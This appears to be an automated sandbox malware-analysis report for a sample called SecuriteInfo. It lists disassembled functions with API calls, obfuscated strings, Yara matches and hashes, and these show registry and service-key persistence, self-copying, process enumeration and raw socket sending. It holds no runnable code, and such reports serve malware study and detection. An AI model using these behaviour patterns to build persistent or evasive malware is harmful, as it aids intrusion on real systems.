                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27ed15e8ebd261a986b18739fd87f69064e5f4c341f4740d4a130b88b50e07ab
                                                                    • Instruction ID: a5960de4cf17dd3b0a9f79f945068c1ce8d00a101c0abfde3528a3c9e2b19d99
                                                                    • Opcode Fuzzy Hash: 27ed15e8ebd261a986b18739fd87f69064e5f4c341f4740d4a130b88b50e07ab
                                                                    • Instruction Fuzzy Hash: 3BD01731311208DFCB02AF98DA81AADB3B1FB08794F500066E502A76A5C634ED00CF90
                                                                    Function 022B570E Relevance: .0, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d009c795e1b5b56f8cfbd45d1513fd4e2268b6e334f0bec6c96cf9d0e05136cc
                                                                    • Instruction ID: 77a5a7ce7d5c5905ccb011330327f5a4cd5829a615c8b907a8115606417732ff
                                                                    • Opcode Fuzzy Hash: d009c795e1b5b56f8cfbd45d1513fd4e2268b6e334f0bec6c96cf9d0e05136cc
                                                                    • Instruction Fuzzy Hash: F3D05B3229125497C7356A89A908FC17FD9DB54760F254025BA049B560C6F0A851D7D8
                                                                    Function 0228506F Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d79b4b9385bb34c374dae32fc7f6d59ba88ca4b053b9d620c1b629d5fb575e66
                                                                    • Instruction ID: dce27d0525bddae774bfb5e5259ffcda1ddf084b90d73988d921636278647e65
                                                                    • Opcode Fuzzy Hash: d79b4b9385bb34c374dae32fc7f6d59ba88ca4b053b9d620c1b629d5fb575e66
                                                                    • Instruction Fuzzy Hash: 30D017B7A25B54CFDB259B88951179DB7B4F784B61F10466AD412A76C0D3791A008B80
                                                                    Function 022C107F Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bd4aefbcc3b2da2f08434f529dd0310ea7ab3d224dff40342c7716d2d2ead33
                                                                    • Instruction ID: 1edb78a912b6815bf66167f0339bf4b9f63060d518ede726d700aea8ce117739
                                                                    • Opcode Fuzzy Hash: 5bd4aefbcc3b2da2f08434f529dd0310ea7ab3d224dff40342c7716d2d2ead33
                                                                    • Instruction Fuzzy Hash: 3DD0C932451050EFC726AB98FC08F8637ACEB8D710B160961B105DB220CA78EC11DB90
                                                                    Function 0228C7A8 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6be6ea28273fe25021f120ac0898516ca69278bcd5583109d73eff6ab162cb52
                                                                    • Instruction ID: 5581b143c1023cf1105bb37492a057d5cd3c53d6e6c98883579062e4fef1fada
                                                                    • Opcode Fuzzy Hash: 6be6ea28273fe25021f120ac0898516ca69278bcd5583109d73eff6ab162cb52
                                                                    • Instruction Fuzzy Hash: 57C01232A629428AEF157B60D94871233E8A700A06F050465A001C50E4D724C581E514
                                                                    Function 022864CE Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b8899d4beaf254aaddf334fb512213079ee1abaae6715c9614e0507c0eaeb0e
                                                                    • Instruction ID: 4f28ab583ebfdfe581a443a1273ac3f99889a22ccb042f14be1df2d34687d367
                                                                    • Opcode Fuzzy Hash: 3b8899d4beaf254aaddf334fb512213079ee1abaae6715c9614e0507c0eaeb0e
                                                                    • Instruction Fuzzy Hash: 71D01232181648EBCB366F84E909FA57BA9E764760F158020B6080A5B0C775D9A0DA84
                                                                    Function 022BD5A4 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6decd825ab2b0d03fc4b9d5e81c8334116ede9b199049ddf32b2fdf77523e62
                                                                    • Instruction ID: 2fadcb9b8d6f5e7c2c3156a02e9a4168ac71070aaa0be896ca6d9c56d40cb01a
                                                                    • Opcode Fuzzy Hash: e6decd825ab2b0d03fc4b9d5e81c8334116ede9b199049ddf32b2fdf77523e62
                                                                    • Instruction Fuzzy Hash: F1D0C971C52557DFCF32AA95CA48BEAB6B4AF04799F094464E5146506483346540DF90
                                                                    Function 02479237 Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                    • Instruction ID: 3a1f6abad644aa62d9c7aaf17028e7a35afd8b3c7ebe03891e621acd82231ac6
                                                                    • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                    • Instruction Fuzzy Hash: 38C08C30280A009BEB226B22CD01B013AA1BB51B06F4404A06308E90F0CB78D816DA00
                                                                    Function 022CA7A4 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 519e30a5a2cf0e67232b1f23451a07e3a33789783c306786d402c2434024a78e
                                                                    • Instruction ID: 2dc07a6a4b60047cb16c6752faeb97cc2442787e5425c72046161ea74d76b5e0
                                                                    • Opcode Fuzzy Hash: 519e30a5a2cf0e67232b1f23451a07e3a33789783c306786d402c2434024a78e
                                                                    • Instruction Fuzzy Hash: 2FC01231892440DFCF625F94ED1DE467AB5FB94B10F150558B0054513497718850DA00
                                                                    Function 004115F0 Relevance: 87.9, APIs: 34, Strings: 16, Instructions: 377threadsleepregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 004115FC
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00411607
                                                                    • PostThreadMessageA.USER32(00000000), ref: 0041160E
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041161E
                                                                      • Part of subcall function 004115AF: CoInitialize.OLE32(00000000), ref: 004115B8
                                                                      • Part of subcall function 004115AF: CoCreateGuid.COMBASE(?), ref: 004115C2
                                                                      • Part of subcall function 004115AF: _snprintf.MSVCRT ref: 004115DC
                                                                      • Part of subcall function 004115AF: CoUninitialize.COMBASE ref: 004115E5
                                                                    • CreateThread.KERNEL32(00000000,00000000,100094E6,00000000,00000000,00000000), ref: 004116DD
                                                                    • Sleep.KERNEL32(000F4240), ref: 004116ED
                                                                    • ExpandEnvironmentStringsA.KERNEL32(100131B8,?,00000104), ref: 0041175B
                                                                    • strlen.MSVCRT ref: 00411782
                                                                    • strlen.MSVCRT ref: 0041179B
                                                                    • _mbscat.MSVCRT ref: 004117B4
                                                                    • _mbscat.MSVCRT ref: 004117C4
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 004117D9
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 004117EE
                                                                    • Sleep.KERNEL32(000001F4), ref: 00411822
                                                                    • CreateThread.KERNEL32(00000000,00000000,100093AC,00000000,00000000,00000000), ref: 00411883
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004118AB
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 004118BD
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,10013EE8,00000000,000F003F,?), ref: 004118D7
                                                                    • RegSetValueExA.ADVAPI32(?,100145A0,00000000,00000001,?,00000050), ref: 004118F2
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004118FB
                                                                    • Sleep.KERNEL32(000F4240), ref: 0041190B
                                                                    • sprintf.MSVCRT ref: 00411941
                                                                    • lstrlen.KERNEL32(?), ref: 0041199A
                                                                    • memset.MSVCRT ref: 004119E2
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004119F3
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002B,00000000), ref: 00411A04
                                                                    • MoveFileA.KERNEL32(?,?), ref: 00411A47
                                                                    • memset.MSVCRT ref: 00411A56
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00411A67
                                                                    • ExitProcess.KERNEL32 ref: 0041182E
                                                                      • Part of subcall function 0041209F: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                      • Part of subcall function 0041209F: _beginthreadex.MSVCRT ref: 004120D6
                                                                      • Part of subcall function 0041209F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                      • Part of subcall function 0041209F: CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A8F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411A96
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411ABD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411AC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateModuleNameThread$HandleObjectSingleSleepWait$CopyMessage_mbscatmemsetstrlen$CurrentEnvironmentEventExitExpandFolderGuidInitializeInputMoveOpenPathPostProcessSpecialStateStringsUninitializeValue_beginthreadex_snprintflstrlensprintf
                                                                    • String ID: %$C$G$Rsjshd fzfgkqcm$\$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 1330378773-434793907
                                                                    • Opcode ID: 38b080db33efb3038d56c8d4034df92c0bf0f0d8651088bdd00c663a71e80371
                                                                    • Instruction ID: 162d77de2292474d7f8d6707a30e614de1a74aa1ac54c6ec843b9a24d7d8244d
                                                                    • Opcode Fuzzy Hash: 38b080db33efb3038d56c8d4034df92c0bf0f0d8651088bdd00c663a71e80371
                                                                    • Instruction Fuzzy Hash: 02D163B1C0425CBBEB10E7A48C88EEF7B7CEB05344F0441A6F605A6156DB799F88CB65
                                                                    Function 1000A44E Relevance: 80.6, APIs: 9, Strings: 37, Instructions: 99librarystringloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10009826,?,?,75A78400,00000000), ref: 1000A4F7
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1000A4FE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000128), ref: 1000A512
                                                                    • Process32First.KERNEL32(?,00000000), ref: 1000A521
                                                                    • _strcmpi.MSVCRT ref: 1000A531
                                                                    • Process32Next.KERNEL32(?,00000000), ref: 1000A544
                                                                    • lstrcmpiA.KERNEL32(00000024,?), ref: 1000A554
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A55D
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000A564
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process32$??2@??3@AddressCloseFirstHandleLibraryLoadNextProc_strcmpilstrcmpi
                                                                    • String ID: .$2$2$3$3$C$E$E$K$KERNEL32.dll$L$N$R$S$T$a$a$d$e$e$e$h$h$l$l$l$l$n$o$o$o$p$p$r$s$t$t
                                                                    • API String ID: 3812609237-889578591
                                                                    • Opcode ID: 40b1ad887007fb4ee152f169d4ef71607621b84fcc169c244ff2be38619ab5b2
                                                                    • Instruction ID: ba2bc44bdaa4dbc0aa0ab587657f0c164c7b9ca9e2f38cf02ca266cea0b859b5
                                                                    • Opcode Fuzzy Hash: 40b1ad887007fb4ee152f169d4ef71607621b84fcc169c244ff2be38619ab5b2
                                                                    • Instruction Fuzzy Hash: 1D414220C0C6D9DDFB02D7A8C848BDEBFB55F27748F084189D1847A282C7BA5658C77A
                                                                    Function 1000870C Relevance: 77.2, APIs: 24, Strings: 20, Instructions: 159libraryloaderfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$#540#800#860#941FileFindLibraryLoad_mbscmp$#940AttributesCloseDirectoryH_prologNextRemove_mbsicmp
                                                                    • String ID: A$F$F$F$KERNEL32.dll$LoadLibraryA$SetFileAttributesA$\*.*$d$desktop.ini$e$i$i$i$index.dat$l$n$r$s$t
                                                                    • API String ID: 872879381-4179677004
                                                                    • Opcode ID: 0f35c9e2666ea853d80432bf8a4c6b15b8ba5baff7b9932b491024ab045edd1b
                                                                    • Instruction ID: 550540678717dc9560bb5a6443bf438c6421b050beaa66f5a9c96ae308b9795e
                                                                    • Opcode Fuzzy Hash: 0f35c9e2666ea853d80432bf8a4c6b15b8ba5baff7b9932b491024ab045edd1b
                                                                    • Instruction Fuzzy Hash: 3A517A3180429EEAEF01DBA4CC49BEFBFB4FF19394F144069E254B20A5DB759A44CB61
                                                                    Function 0041249A Relevance: 75.3, APIs: 7, Strings: 36, Instructions: 99librarystringloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?), ref: 00412543
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041254A
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000128), ref: 0041255E
                                                                    • _strcmpi.MSVCRT ref: 0041257D
                                                                    • lstrcmpiA.KERNEL32(00000024,0041023E), ref: 004125A0
                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 004125A9
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004125B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@??3@AddressCloseHandleLibraryLoadProc_strcmpilstrcmpi
                                                                    • String ID: .$2$2$3$3$C$E$E$K$L$N$R$S$T$a$a$d$e$e$e$h$h$l$l$l$l$n$o$o$o$p$p$r$s$t$t
                                                                    • API String ID: 4033398891-172469957
                                                                    • Opcode ID: a85d4da7e25bfc021008fdb4eb895b0e9db7dcc5a7775750773341ec229fc6c2
                                                                    • Instruction ID: 6612384d74de1075318b009a634c612a85a63009bb421a5cb98037d6a9ebd229
                                                                    • Opcode Fuzzy Hash: a85d4da7e25bfc021008fdb4eb895b0e9db7dcc5a7775750773341ec229fc6c2
                                                                    • Instruction Fuzzy Hash: E0412520C082C9EDFB0297E8C9487DEBFB55F26748F084099D18476282C7FE5658C7BA
                                                                    Function 10003F3F Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 253stringnetworkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$strcspnstrstr$strcpy$CountExitThreadTickinet_addrstrncpy$CleanupSleepSocketclosesocketgethostbynamememcpyrandsendtosetsockoptsrandstrlentime
                                                                    • String ID: http://
                                                                    • API String ID: 979503427-1121587658
                                                                    • Opcode ID: 6771483aa2a22676fd8939427ac368e0207a9097a12a7897363da1047b258fd2
                                                                    • Instruction ID: bb97d4083fff4617a1cfe2956ce7e6f398109422fa3043ddc87db9e501804352
                                                                    • Opcode Fuzzy Hash: 6771483aa2a22676fd8939427ac368e0207a9097a12a7897363da1047b258fd2
                                                                    • Instruction Fuzzy Hash: 55818FB2900358AAEB10DBF4CC89FDF7BBCEF05390F014565F215E6195EB74AA448BA4
                                                                    Function 100052FE Relevance: 61.6, APIs: 3, Strings: 38, Instructions: 75stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 1000532F
                                                                    • wsprintfA.USER32 ref: 100053D6
                                                                    • lstrlenA.KERNEL32(\Services\%s,00000000), ref: 100053E4
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: %$C$C$E$M$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$\Services\%s$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 1858923263-2861751080
                                                                    • Opcode ID: 59d64f1269ff033f8419e97669b2c6b3e058a6ae54e3d9c5fea5dff478d7e752
                                                                    • Instruction ID: e9fdd2095035c720c5a7786ee72f50f20d77f3a9c16efb1193372417d4f12b2d
                                                                    • Opcode Fuzzy Hash: 59d64f1269ff033f8419e97669b2c6b3e058a6ae54e3d9c5fea5dff478d7e752
                                                                    • Instruction Fuzzy Hash: 5D31DA50D0C6C9D9EB02C7A8C8097DEBFA51B26349F0840D8D6847A292C6FE575887BA
                                                                    Function 0040F177 Relevance: 60.1, APIs: 3, Strings: 37, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F1A3
                                                                    • memset.MSVCRT ref: 0040F1B5
                                                                    • wsprintfA.USER32 ref: 0040F25B
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041264D
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 00412660
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041266E
                                                                      • Part of subcall function 00412618: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                      • Part of subcall function 00412618: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
